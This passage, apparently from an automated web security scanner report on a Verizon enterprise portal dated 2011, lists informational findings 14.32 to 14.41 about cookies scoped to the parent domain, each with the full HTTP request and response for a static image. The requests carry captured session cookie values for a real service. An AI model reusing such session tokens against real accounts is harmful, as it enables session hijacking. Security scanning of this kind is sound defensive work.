Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 330
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "14a-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7161
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

...[SNIP]...

14.32. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 805
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "325-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:46 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

...[SNIP]...

14.33. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 219
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "db-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:43 GMT

...[SNIP]...

14.34. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 63
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "3f-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT


14.35. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 446
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "1be-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7167
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

...[SNIP]...

14.36. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 445
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "1bd-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7187
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

...[SNIP]...

14.37. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 336
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "150-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:25:26 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

...[SNIP]...

14.38. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 334
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "14e-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7146
Date: Mon, 05 Sep 2011 22:25:26 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

...[SNIP]...

14.39. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 43
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "2b-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7193
Date: Mon, 05 Sep 2011 22:22:46 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT


14.40. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_HelpLarge.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/icn_HelpLarge.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/icn_HelpLarge.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 634
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "27a-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7145
Date: Mon, 05 Sep 2011 22:40:49 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

GIF89a.........................................................................................................................................................................vvvnnnmmmllljjjiiiYYYX
...[SNIP]...

14.41. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_errorMssg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
